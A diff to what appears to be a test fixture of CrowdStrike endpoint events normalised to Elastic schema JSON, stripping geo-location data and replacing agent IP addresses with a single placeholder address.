"created": "2021-07-07T17:04:10.083Z", "kind": "state", "action": "NeighborListIP4", @@ -4800,24 +4223,12 @@ "preserve_original_event" ], "observer": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-AR", - "city_name": "Little Rock", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Arkansas", - "location": { - "lon": -92.3565, - "lat": 34.7721 - } - }, - "address": "208.70.175.112", - "vendor": "crowdstrike", - "ip": "208.70.175.112", "serial_number": "ffffffff2d984e32b702789b54f0f811", + "address": "67.43.156.14", "type": "agent", - "version": "1007.4.0013701.1" + "version": "1007.4.0013701.1", + "vendor": "crowdstrike", + "ip": "67.43.156.14" }, "@timestamp": "2021-07-07T17:04:14.557Z", "file": { 
@@ -4833,18 +4244,18 @@ }, "related": { "hosts": [ - "208.70.175.112" + "67.43.156.14" ], "hash": [ "3090255842" ], "ip": [ - "208.70.175.112" + "67.43.156.14" ] }, "event": { - "ingested": "2021-11-22T09:23:55.465800Z", - "original": "{\"event_simpleName\":\"ZipFileWritten\",\"ContextTimeStamp\":\"1625677454.557\",\"ConfigStateHash\":\"3090255842\",\"ContextProcessId\":\"365039419134863763\",\"ContextThreadId\":\"0\",\"aip\":\"208.70.175.112\",\"FileIdentifier\":\"07000001000000000000000000000000b1445a0900000000\",\"ConfigBuild\":\"1007.4.0013701.1\",\"event_platform\":\"Mac\",\"Entitlements\":\"15\",\"name\":\"ZipFileWrittenMacV1\",\"id\":\"ffffffff-1111-11eb-ab6e-0668ec51180b\",\"EffectiveTransmissionClass\":\"2\",\"aid\":\"ffffffff2d984e32b702789b54f0f811\",\"timestamp\":\"1625677454723\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\",\"TargetFileName\":\"/Users/user6/Library/Developer/CoreSimulator/Devices/BCE6B46B-E863-4151-AA9D-D71C79438C47/data/Containers/Data/Application/1249A061-F246-4338-AE56-4373E918C9B4/Library/Application Support/com.instacart.instashopper/LogCache/2021-07-06T23:44:46.133Z.zip\"}", + "ingested": "2021-12-09T13:36:11.150918200Z", + "original": 
"{\"event_simpleName\":\"ZipFileWritten\",\"ContextTimeStamp\":\"1625677454.557\",\"ConfigStateHash\":\"3090255842\",\"ContextProcessId\":\"365039419134863763\",\"ContextThreadId\":\"0\",\"aip\":\"67.43.156.14\",\"FileIdentifier\":\"07000001000000000000000000000000b1445a0900000000\",\"ConfigBuild\":\"1007.4.0013701.1\",\"event_platform\":\"Mac\",\"Entitlements\":\"15\",\"name\":\"ZipFileWrittenMacV1\",\"id\":\"ffffffff-1111-11eb-ab6e-0668ec51180b\",\"EffectiveTransmissionClass\":\"2\",\"aid\":\"ffffffff2d984e32b702789b54f0f811\",\"timestamp\":\"1625677454723\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\",\"TargetFileName\":\"/Users/user6/Library/Developer/CoreSimulator/Devices/BCE6B46B-E863-4151-AA9D-D71C79438C47/data/Containers/Data/Application/1249A061-F246-4338-AE56-4373E918C9B4/Library/Application Support/com.instacart.instashopper/LogCache/2021-07-06T23:44:46.133Z.zip\"}", "created": "2021-07-07T17:04:14.723Z", "kind": "event", "action": "ZipFileWritten", @@ -4876,24 +4287,12 @@ "preserve_original_event" ], "observer": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-WV", - "city_name": "Hurricane", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "West Virginia", - "location": { - "lon": -81.9947, - "lat": 38.4203 - } - }, - "address": "208.180.129.90", - "vendor": "crowdstrike", - "ip": "208.180.129.90", "serial_number": "ffffffffbea440b9aad8b5bf222d303f", + "address": "67.43.156.14", "type": "agent", - "version": "6.24.13701.0" + "version": "6.24.13701.0", + "vendor": "crowdstrike", + "ip": "67.43.156.14" }, "@timestamp": "2021-07-07T17:04:05.731Z", "file": { @@ -4905,14 +4304,14 @@ }, "related": { "hosts": [ - "208.180.129.90", + "67.43.156.14", "comp2" ], "hash": [ "3967242894" ], "ip": [ - "208.180.129.90" + "67.43.156.14" ] }, "host": { 
@@ -4920,8 +4319,8 @@ "hostname": "comp2" }, "event": { - "ingested": "2021-11-22T09:23:55.465806700Z", - "original": "{\"AgentVersion\":\"6.24.13701.0\",\"aip\":\"208.180.129.90\",\"ConfigIDBase\":\"65994753\",\"BiosReleaseDate\":\"01/06/2021\",\"CpuFeaturesMask\":\"7494065083858915\",\"ChasisManufacturer\":\"Apple Inc.\",\"SystemSerialNumber\":\"C02F649EMD6R\",\"event_platform\":\"Mac\",\"AgentLoadFlags\":\"0\",\"CpuVendor\":\"0\",\"id\":\"ffffffff-1111-11eb-b3de-06a53f021cc9\",\"BiosVersion\":\"1554.80.3.0.0 (iBridge: 18.16.14347.0.0,0)\",\"CpuSignature\":\"591594\",\"EffectiveTransmissionClass\":\"0\",\"MoboProductName\":\"Mac-E1008331FDC96864\",\"timestamp\":\"1625677460451\",\"MicrocodeSignature\":\"16045690984229358334\",\"event_simpleName\":\"AgentOnline\",\"ContextTimeStamp\":\"1625677445.731\",\"SystemProductName\":\"MacBookPro16,1\",\"MoboManufacturer\":\"Apple Inc.\",\"ConfigStateHash\":\"3967242894\",\"ConfigBuild\":\"1007.4.0013701.1\",\"SystemSku\":\" \",\"SensorGroupingTags\":\"\",\"ConfigurationVersion\":\"10\",\"AgentLocalTime\":\"1625677445.731\",\"BiosManufacturer\":\"Apple Inc.\",\"Entitlements\":\"15\",\"name\":\"AgentOnlineMacV13\",\"ConfigIDPlatform\":\"4\",\"ComputerName\":\"comp2\",\"ChassisType\":\"9\",\"ConfigIDBuild\":\"13701\",\"SystemManufacturer\":\"Apple Inc.\",\"aid\":\"ffffffffbea440b9aad8b5bf222d303f\",\"ProvisionState\":\"1\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\",\"TargetFileName\":\"Zero\"}", + "ingested": "2021-12-09T13:36:11.150924500Z", + "original": "{\"AgentVersion\":\"6.24.13701.0\",\"aip\":\"67.43.156.14\",\"ConfigIDBase\":\"65994753\",\"BiosReleaseDate\":\"01/06/2021\",\"CpuFeaturesMask\":\"7494065083858915\",\"ChasisManufacturer\":\"Apple Inc.\",\"SystemSerialNumber\":\"C02F649EMD6R\",\"event_platform\":\"Mac\",\"AgentLoadFlags\":\"0\",\"CpuVendor\":\"0\",\"id\":\"ffffffff-1111-11eb-b3de-06a53f021cc9\",\"BiosVersion\":\"1554.80.3.0.0 (iBridge: 
18.16.14347.0.0,0)\",\"CpuSignature\":\"591594\",\"EffectiveTransmissionClass\":\"0\",\"MoboProductName\":\"Mac-E1008331FDC96864\",\"timestamp\":\"1625677460451\",\"MicrocodeSignature\":\"16045690984229358334\",\"event_simpleName\":\"AgentOnline\",\"ContextTimeStamp\":\"1625677445.731\",\"SystemProductName\":\"MacBookPro16,1\",\"MoboManufacturer\":\"Apple Inc.\",\"ConfigStateHash\":\"3967242894\",\"ConfigBuild\":\"1007.4.0013701.1\",\"SystemSku\":\" \",\"SensorGroupingTags\":\"\",\"ConfigurationVersion\":\"10\",\"AgentLocalTime\":\"1625677445.731\",\"BiosManufacturer\":\"Apple Inc.\",\"Entitlements\":\"15\",\"name\":\"AgentOnlineMacV13\",\"ConfigIDPlatform\":\"4\",\"ComputerName\":\"comp2\",\"ChassisType\":\"9\",\"ConfigIDBuild\":\"13701\",\"SystemManufacturer\":\"Apple Inc.\",\"aid\":\"ffffffffbea440b9aad8b5bf222d303f\",\"ProvisionState\":\"1\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\",\"TargetFileName\":\"Zero\"}", "created": "2021-07-07T17:04:20.451Z", "kind": "state", "action": "AgentOnline", @@ -4986,21 +4385,12 @@ "preserve_original_event" ], "observer": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "208.93.153.49", - "vendor": "crowdstrike", - "ip": "208.93.153.49", "serial_number": "ffffffff8eca418b7a861be9c5f7de1d", + "address": "67.43.156.14", "type": "agent", - "version": "1007.4.0013701.1" + "version": "1007.4.0013701.1", + "vendor": "crowdstrike", + "ip": "67.43.156.14" }, "@timestamp": "2021-07-07T17:03:58.515Z", "file": { 
@@ -5015,18 +4405,18 @@ }, "related": { "hosts": [ - "208.93.153.49" + "67.43.156.14" ], "hash": [ "3090255842" ], "ip": [ - "208.93.153.49" + "67.43.156.14" ] }, "event": { - "ingested": "2021-11-22T09:23:55.465813500Z", - "original": "{\"event_simpleName\":\"CriticalFileAccessed\",\"ContextTimeStamp\":\"1625677438.515\",\"GID\":\"0\",\"ConfigStateHash\":\"3090255842\",\"ContextProcessId\":\"365053399098988534\",\"ContextThreadId\":\"0\",\"aip\":\"208.93.153.49\",\"ConfigBuild\":\"1007.4.0013701.1\",\"UID\":\"0\",\"event_platform\":\"Mac\",\"UnixMode\":\"384\",\"Entitlements\":\"15\",\"name\":\"CriticalFileAccessedMacV1\",\"id\":\"ffffffff-1111-11eb-956a-02748d01bd3d\",\"EffectiveTransmissionClass\":\"2\",\"aid\":\"ffffffff8eca418b7a861be9c5f7de1d\",\"timestamp\":\"1625677438553\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\",\"TargetFileName\":\"/private/var/db/dslocal/nodes/Default/users/daemon.plist\"}", + "ingested": "2021-12-09T13:36:11.150930800Z", + "original": "{\"event_simpleName\":\"CriticalFileAccessed\",\"ContextTimeStamp\":\"1625677438.515\",\"GID\":\"0\",\"ConfigStateHash\":\"3090255842\",\"ContextProcessId\":\"365053399098988534\",\"ContextThreadId\":\"0\",\"aip\":\"67.43.156.14\",\"ConfigBuild\":\"1007.4.0013701.1\",\"UID\":\"0\",\"event_platform\":\"Mac\",\"UnixMode\":\"384\",\"Entitlements\":\"15\",\"name\":\"CriticalFileAccessedMacV1\",\"id\":\"ffffffff-1111-11eb-956a-02748d01bd3d\",\"EffectiveTransmissionClass\":\"2\",\"aid\":\"ffffffff8eca418b7a861be9c5f7de1d\",\"timestamp\":\"1625677438553\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\",\"TargetFileName\":\"/private/var/db/dslocal/nodes/Default/users/daemon.plist\"}", "created": "2021-07-07T17:03:58.553Z", "kind": "alert", "action": "CriticalFileAccessed", 
@@ -5056,24 +4446,12 @@ }, { "observer": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-WV", - "city_name": "Hurricane", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "West Virginia", - "location": { - "lon": -81.9947, - "lat": 38.4203 - } - }, - "address": "208.180.129.90", - "vendor": "crowdstrike", - "ip": "208.180.129.90", "serial_number": "ffffffffbea440b9aad8b5bf222d303f", + "address": "67.43.156.14", "type": "agent", - "version": "6.24.13701.0" + "version": "6.24.13701.0", + "vendor": "crowdstrike", + "ip": "67.43.156.14" }, "@timestamp": "2021-07-07T17:04:22.356Z", "os": { 
@@ -5085,18 +4463,18 @@ }, "related": { "hosts": [ - "208.180.129.90" + "67.43.156.14" ], "hash": [ "3967242894" ], "ip": [ - "208.180.129.90" + "67.43.156.14" ] }, "event": { - "ingested": "2021-11-22T09:23:55.465820200Z", - "original": "{\"MajorVersion\":\"19\",\"event_simpleName\":\"OsVersionInfo\",\"OSVersionFileData\":\"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\",\"ConfigStateHash\":\"3967242894\",\"AgentVersion\":\"6.24.13701.0\",\"aip\":\"208.180.129.90\",\"MinorVersion\":\"6\",\"OSVersionString\":\"Darwin Kernel Version 19.6.0: Tue Jan 12 22:13:05 PST 2021; root:xnu-6153.141.16~1/RELEASE_X86_64\",\"ConfigBuild\":\"1007.4.0013701.1\",\"event_platform\":\"Mac\",\"Entitlements\":\"15\",\"name\":\"OsVersionInfoMacV3\",\"RFMState\":\"0\",\"id\":\"ffffffff-1111-11eb-b3de-06a53f021cc9\",\"OSVersionFileName\":\"/System/Library/CoreServices/SystemVersion.plist\",\"EffectiveTransmissionClass\":\"2\",\"aid\":\"ffffffffbea440b9aad8b5bf222d303f\",\"timestamp\":\"1625677462356\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\"}", + "ingested": "2021-12-09T13:36:11.150937Z", + "original": "{\"MajorVersion\":\"19\",\"event_simpleName\":\"OsVersionInfo\",\"OSVersionFileData\":\"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\",\"ConfigStateHash\":\"3967242894\",\"AgentVersion\":\"6.24.13701.0\",\"aip\":\"67.43.156.14\",\"MinorVersion\":\"6\",\"OSVersionString\":\"Darwin Kernel Version 19.6.0: Tue Jan 12 22:13:05 PST 2021; root:xnu-6153.141.16~1/RELEASE_X86_64\",\"ConfigBuild\":\"1007.4.0013701.1\",\"event_platform\":\"Mac\",\"Entitlements\":\"15\",\"name\":\"OsVersionInfoMacV3\",\"RFMState\":\"0\",\"id\":\"ffffffff-1111-11eb-b3de-06a53f021cc9\",\"OSVersionFileName\":\"/System/Library/CoreServices/SystemVersion.plist\",\"EffectiveTransmissionClass\":\"2\",\"aid\":\"ffffffffbea440b9aad8b5bf222d303f\",\"timestamp\":\"1625677462356\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\"}", "created": "2021-07-07T17:04:22.356Z", "kind": "event", "action": "OsVersionInfo", 
@@ -5131,21 +4509,12 @@ }, { "observer": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "208.233.129.250", - "vendor": "crowdstrike", - "ip": "208.233.129.250", "serial_number": "ffffffff4f4044b689d6420d303e4ecd", + "address": "67.43.156.14", "type": "agent", - "version": "1007.8.0010912.1" + "version": "1007.8.0010912.1", + "vendor": "crowdstrike", + "ip": "67.43.156.14" }, "@timestamp": "2021-07-07T17:03:56.454Z", "os": { 
@@ -5156,18 +4525,18 @@ }, "related": { "hosts": [ - "208.233.129.250" + "67.43.156.14" ], "hash": [ "1284133626" ], "ip": [ - "208.233.129.250" + "67.43.156.14" ] }, "event": { - "ingested": "2021-11-22T09:23:55.465826900Z", - "original": "{\"ConfigBuild\":\"1007.8.0010912.1\",\"event_simpleName\":\"ConfigStateUpdate\",\"event_platform\":\"Lin\",\"ConfigStateHash\":\"1284133626\",\"ConfigStateData\":\"0,0,1007.8.0010912.1|1,c,0|1,10,1|1,11,0|1,12,1|1,13,1|1,14,19|1,15,3|1,1f,4|1,22,3|1,3b,1|1,59,2d|1,d3,263|1,d4,0|1,eb,36|1,201,1|2,0,a8000000032,140000000085,18000000004c,18000000004f,180000000054,18000000022a,180000000248,180000000279,18000000027a,1800000002b4,180400000079,180400000225,180c00000133,180c00000285,181000000128,181000000180,18100000021f,181000000220,181000000280,1c0400000205|\",\"name\":\"ConfigStateUpdateLinV1\",\"aip\":\"208.233.129.250\",\"id\":\"ffffffff-1111-11eb-8e88-068a8894a447\",\"aid\":\"ffffffff4f4044b689d6420d303e4ecd\",\"timestamp\":\"1625677436454\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\"}", + "ingested": "2021-12-09T13:36:11.150943400Z", + "original": "{\"ConfigBuild\":\"1007.8.0010912.1\",\"event_simpleName\":\"ConfigStateUpdate\",\"event_platform\":\"Lin\",\"ConfigStateHash\":\"1284133626\",\"ConfigStateData\":\"0,0,1007.8.0010912.1|1,c,0|1,10,1|1,11,0|1,12,1|1,13,1|1,14,19|1,15,3|1,1f,4|1,22,3|1,3b,1|1,59,2d|1,d3,263|1,d4,0|1,eb,36|1,201,1|2,0,a8000000032,140000000085,18000000004c,18000000004f,180000000054,18000000022a,180000000248,180000000279,18000000027a,1800000002b4,180400000079,180400000225,180c00000133,180c00000285,181000000128,181000000180,18100000021f,181000000220,181000000280,1c0400000205|\",\"name\":\"ConfigStateUpdateLinV1\",\"aip\":\"67.43.156.14\",\"id\":\"ffffffff-1111-11eb-8e88-068a8894a447\",\"aid\":\"ffffffff4f4044b689d6420d303e4ecd\",\"timestamp\":\"1625677436454\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\"}", "created": "2021-07-07T17:03:56.454Z", "kind": "event", "action": "ConfigStateUpdate", 
@@ -5235,21 +4604,12 @@ "preserve_original_event" ], "observer": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "208.203.151.21", - "vendor": "crowdstrike", - "ip": "208.203.151.21", "serial_number": "ffffffff88b948c6abeeee910f6d8c33", + "address": "67.43.156.14", "type": "agent", - "version": "1007.8.0011611.1" + "version": "1007.8.0011611.1", + "vendor": "crowdstrike", + "ip": "67.43.156.14" }, "@timestamp": "2021-07-07T17:02:45.906Z", "file": { 
@@ -5261,18 +4621,18 @@ }, "related": { "hosts": [ - "208.203.151.21" + "67.43.156.14" ], "hash": [ "1333055909" ], "ip": [ - "208.203.151.21" + "67.43.156.14" ] }, "event": { - "ingested": "2021-11-22T09:23:55.465833700Z", - "original": "{\"event_simpleName\":\"LFODownloadConfirmation\",\"ConfigStateHash\":\"1333055909\",\"aip\":\"208.203.151.21\",\"DownloadServer\":\"lfodown01-b.cloudsink.net\",\"DownloadPath\":\"/osfm/linux/bde98295e6e5fa4c6ba2acfebc2e9943c836bf2223aebb8b29e03c44df43cb53\",\"DownloadPort\":\"443\",\"ConfigBuild\":\"1007.8.0011611.1\",\"event_platform\":\"Lin\",\"name\":\"LFODownloadConfirmationLinV1\",\"CompletionEventId\":\"Event_KmaExtDownloadCompleteLinV1\",\"id\":\"ffffffff-1111-11eb-8dee-0201f64cca29\",\"aid\":\"ffffffff88b948c6abeeee910f6d8c33\",\"timestamp\":\"1625677365906\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\",\"TargetFileName\":\"KernelModuleArchiveExt11611\"}", + "ingested": "2021-12-09T13:36:11.150949700Z", + "original": "{\"event_simpleName\":\"LFODownloadConfirmation\",\"ConfigStateHash\":\"1333055909\",\"aip\":\"67.43.156.14\",\"DownloadServer\":\"lfodown01-b.cloudsink.net\",\"DownloadPath\":\"/osfm/linux/bde98295e6e5fa4c6ba2acfebc2e9943c836bf2223aebb8b29e03c44df43cb53\",\"DownloadPort\":\"443\",\"ConfigBuild\":\"1007.8.0011611.1\",\"event_platform\":\"Lin\",\"name\":\"LFODownloadConfirmationLinV1\",\"CompletionEventId\":\"Event_KmaExtDownloadCompleteLinV1\",\"id\":\"ffffffff-1111-11eb-8dee-0201f64cca29\",\"aid\":\"ffffffff88b948c6abeeee910f6d8c33\",\"timestamp\":\"1625677365906\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\",\"TargetFileName\":\"KernelModuleArchiveExt11611\"}", "created": "2021-07-07T17:02:45.906Z", "kind": "event", "action": "LFODownloadConfirmation", 
@@ -5310,21 +4670,12 @@ "preserve_original_event" ], "observer": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "208.23.66.52", - "vendor": "crowdstrike", - "ip": "208.23.66.52", "serial_number": "ffffffffe6244708bd09a6c111f63f4a", + "address": "67.43.156.14", "type": "agent", - "version": "1007.4.0013701.1" + "version": "1007.4.0013701.1", + "vendor": "crowdstrike", + "ip": "67.43.156.14" }, "@timestamp": "2021-07-07T17:02:33.633Z", "file": { 
@@ -5340,18 +4691,18 @@ }, "related": { "hosts": [ - "208.23.66.52" + "67.43.156.14" ], "hash": [ "3090255842" ], "ip": [ - "208.23.66.52" + "67.43.156.14" ] }, "event": { - "ingested": "2021-11-22T09:23:55.465840400Z", - "original": "{\"event_simpleName\":\"TarFileWritten\",\"ContextTimeStamp\":\"1625677353.633\",\"ConfigStateHash\":\"3090255842\",\"ContextProcessId\":\"365049009681176519\",\"ContextThreadId\":\"0\",\"aip\":\"208.23.66.52\",\"FileIdentifier\":\"050000010000000000000000000000005749420100000000\",\"ConfigBuild\":\"1007.4.0013701.1\",\"event_platform\":\"Mac\",\"Entitlements\":\"15\",\"name\":\"TarFileWrittenMacV1\",\"id\":\"ffffffff-1111-11eb-9497-028a0bfcf603\",\"EffectiveTransmissionClass\":\"2\",\"aid\":\"ffffffffe6244708bd09a6c111f63f4a\",\"timestamp\":\"1625677353895\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\",\"TargetFileName\":\"/Users/user7/.rbenv/versions/2.6.6/lib/ruby/gems/2.6.0/cache/database_cleaner-1.8.5.gem\"}", + "ingested": "2021-12-09T13:36:11.150955900Z", + "original": "{\"event_simpleName\":\"TarFileWritten\",\"ContextTimeStamp\":\"1625677353.633\",\"ConfigStateHash\":\"3090255842\",\"ContextProcessId\":\"365049009681176519\",\"ContextThreadId\":\"0\",\"aip\":\"67.43.156.14\",\"FileIdentifier\":\"050000010000000000000000000000005749420100000000\",\"ConfigBuild\":\"1007.4.0013701.1\",\"event_platform\":\"Mac\",\"Entitlements\":\"15\",\"name\":\"TarFileWrittenMacV1\",\"id\":\"ffffffff-1111-11eb-9497-028a0bfcf603\",\"EffectiveTransmissionClass\":\"2\",\"aid\":\"ffffffffe6244708bd09a6c111f63f4a\",\"timestamp\":\"1625677353895\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\",\"TargetFileName\":\"/Users/user7/.rbenv/versions/2.6.6/lib/ruby/gems/2.6.0/cache/database_cleaner-1.8.5.gem\"}", "created": "2021-07-07T17:02:33.895Z", "kind": "event", "action": "TarFileWritten", 
@@ -5374,21 +4725,12 @@ }, { "observer": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "208.42.18.78", - "vendor": "crowdstrike", - "ip": "208.42.18.78", "serial_number": "ffffffff2977460db2898ece881a9358", + "address": "67.43.156.14", "type": "agent", - "version": "1007.4.0013701.1" + "version": "1007.4.0013701.1", + "vendor": "crowdstrike", + "ip": "67.43.156.14" }, "@timestamp": "2021-07-07T17:02:30.466Z", "os": { 
@@ -5399,18 +4741,18 @@ }, "related": { "hosts": [ - "208.42.18.78" + "67.43.156.14" ], "hash": [ "3967242894" ], "ip": [ - "208.42.18.78" + "67.43.156.14" ] }, "event": { - "ingested": "2021-11-22T09:23:55.465847Z", - "original": "{\"event_simpleName\":\"AgentConnect\",\"ConfigStateHash\":\"3967242894\",\"NetworkContainmentState\":\"0\",\"VerifiedCertificate\":\"7431e5f4c3c1ce4690774f0b61e05440883ba9a01ed00ba6abd7806ed3b118cf\",\"aip\":\"208.42.18.78\",\"ConfigIDBase\":\"65994753\",\"FailedConnectCount\":\"404\",\"ConnectType\":\"1\",\"ConfigBuild\":\"1007.4.0013701.1\",\"event_platform\":\"Mac\",\"ConfigurationVersion\":\"10\",\"Entitlements\":\"15\",\"name\":\"AgentConnectMacV5\",\"ConfigIDPlatform\":\"4\",\"PreviousConnectTime\":\"1625673963.331\",\"id\":\"ffffffff-1111-11eb-ba54-02a3616f6acd\",\"ConfigIDBuild\":\"13701\",\"ConnectTime\":\"1625677350.208\",\"EffectiveTransmissionClass\":\"2\",\"aid\":\"ffffffff2977460db2898ece881a9358\",\"ProvisionState\":\"0\",\"timestamp\":\"1625677350466\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\"}", + "ingested": "2021-12-09T13:36:11.150962300Z", + "original": "{\"event_simpleName\":\"AgentConnect\",\"ConfigStateHash\":\"3967242894\",\"NetworkContainmentState\":\"0\",\"VerifiedCertificate\":\"7431e5f4c3c1ce4690774f0b61e05440883ba9a01ed00ba6abd7806ed3b118cf\",\"aip\":\"67.43.156.14\",\"ConfigIDBase\":\"65994753\",\"FailedConnectCount\":\"404\",\"ConnectType\":\"1\",\"ConfigBuild\":\"1007.4.0013701.1\",\"event_platform\":\"Mac\",\"ConfigurationVersion\":\"10\",\"Entitlements\":\"15\",\"name\":\"AgentConnectMacV5\",\"ConfigIDPlatform\":\"4\",\"PreviousConnectTime\":\"1625673963.331\",\"id\":\"ffffffff-1111-11eb-ba54-02a3616f6acd\",\"ConfigIDBuild\":\"13701\",\"ConnectTime\":\"1625677350.208\",\"EffectiveTransmissionClass\":\"2\",\"aid\":\"ffffffff2977460db2898ece881a9358\",\"ProvisionState\":\"0\",\"timestamp\":\"1625677350466\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\"}", "created": "2021-07-07T17:02:30.466Z", "kind": 
"event", "action": "AgentConnect", @@ -5475,21 +4817,12 @@ "preserve_original_event" ], "observer": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "208.25.66.51", - "vendor": "crowdstrike", - "ip": "208.25.66.51", "serial_number": "ffffffff5e8b4724aa10088c4f71cd9a", + "address": "67.43.156.14", "type": "agent", - "version": "1007.4.0013701.1" + "version": "1007.4.0013701.1", + "vendor": "crowdstrike", + "ip": "67.43.156.14" }, "@timestamp": "2021-07-07T17:05:25.235Z", "file": { 
@@ -5501,18 +4834,18 @@ }, "related": { "hosts": [ - "208.25.66.51" + "67.43.156.14" ], "hash": [ "3090255842" ], "ip": [ - "208.25.66.51" + "67.43.156.14" ] }, "event": { - "ingested": "2021-11-22T09:23:55.465853700Z", - "original": "{\"event_simpleName\":\"LFODownloadConfirmation\",\"ConfigStateHash\":\"3090255842\",\"aip\":\"208.25.66.51\",\"DownloadServer\":\"lfodown01-b.cloudsink.net\",\"DownloadPath\":\"metahash+/cfs/channelfiles/0000000503/66d5e9ea15754bcfb5f9152ec7ac90ac/C-00000503-00000000-00000001.sys\",\"DownloadPort\":\"443\",\"ConfigBuild\":\"1007.4.0013701.1\",\"event_platform\":\"Mac\",\"Entitlements\":\"15\",\"name\":\"LFODownloadConfirmationMacV1\",\"CompletionEventId\":\"Event_ChannelDataDownloadCompleteMacV1\",\"id\":\"ffffffff-1111-11eb-8b09-069ee8920171\",\"EffectiveTransmissionClass\":\"0\",\"aid\":\"ffffffff5e8b4724aa10088c4f71cd9a\",\"timestamp\":\"1625677525235\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\",\"TargetFileName\":\"C-00000503-00000000-00000001.sys\"}", + "ingested": "2021-12-09T13:36:11.150968600Z", + "original": "{\"event_simpleName\":\"LFODownloadConfirmation\",\"ConfigStateHash\":\"3090255842\",\"aip\":\"67.43.156.14\",\"DownloadServer\":\"lfodown01-b.cloudsink.net\",\"DownloadPath\":\"metahash+/cfs/channelfiles/0000000503/66d5e9ea15754bcfb5f9152ec7ac90ac/C-00000503-00000000-00000001.sys\",\"DownloadPort\":\"443\",\"ConfigBuild\":\"1007.4.0013701.1\",\"event_platform\":\"Mac\",\"Entitlements\":\"15\",\"name\":\"LFODownloadConfirmationMacV1\",\"CompletionEventId\":\"Event_ChannelDataDownloadCompleteMacV1\",\"id\":\"ffffffff-1111-11eb-8b09-069ee8920171\",\"EffectiveTransmissionClass\":\"0\",\"aid\":\"ffffffff5e8b4724aa10088c4f71cd9a\",\"timestamp\":\"1625677525235\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\",\"TargetFileName\":\"C-00000503-00000000-00000001.sys\"}", "created": "2021-07-07T17:05:25.235Z", "kind": "event", "action": "LFODownloadConfirmation", 
@@ -5552,21 +4885,12 @@ "preserve_original_event" ], "observer": { - "geo": { - "continent_name": "North America", - "country_name": "United States", - "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" - }, - "address": "208.140.108.235", - "vendor": "crowdstrike", - "ip": "208.140.108.235", "serial_number": "fffffffff1a64286a233d09974b1b377", + "address": "67.43.156.14", "type": "agent", - "version": "1007.4.0013701.1" + "version": "1007.4.0013701.1", + "vendor": "crowdstrike", + "ip": "67.43.156.14" }, "@timestamp": "2021-07-07T17:04:42.148Z", "file": { 
@@ -5580,18 +4904,18 @@ }, "related": { "hosts": [ - "208.140.108.235" + "67.43.156.14" ], "hash": [ "1620585913" ], "ip": [ - "208.140.108.235" + "67.43.156.14" ] }, "event": { - "ingested": "2021-11-22T09:23:55.465860500Z", - "original": "{\"event_simpleName\":\"AsepFileChange\",\"ContextTimeStamp\":\"1625677482.148\",\"ConfigStateHash\":\"1620585913\",\"ContextProcessId\":\"364936256754041721\",\"ContextThreadId\":\"0\",\"aip\":\"208.140.108.235\",\"ConfigBuild\":\"1007.4.0013701.1\",\"event_platform\":\"Mac\",\"Entitlements\":\"15\",\"name\":\"AsepFileChangeMacV1\",\"id\":\"ffffffff-1111-11eb-9e50-064be6e56df7\",\"EffectiveTransmissionClass\":\"2\",\"aid\":\"fffffffff1a64286a233d09974b1b377\",\"timestamp\":\"1625677482403\",\"cid\":\"ffffffff15754bcfb5f9152ec7ac90ac\",\"TargetFileName\":\"/System/Library/AssetsV2/com_apple_MobileAsset_MacSoftwareUpdate/5968e4faeba359dd5270ac282340cc4bd94d348c.asset/AssetData/payloadv2/ecc_data/System/Library/Spotlight/SystemPrefs.mdimporter/Contents/MacOS/SystemPrefs\",\"VnodeModificationType\":\"6\"}", + "ingested": "2021-12-09T13:36:11.150974900Z", + "original": 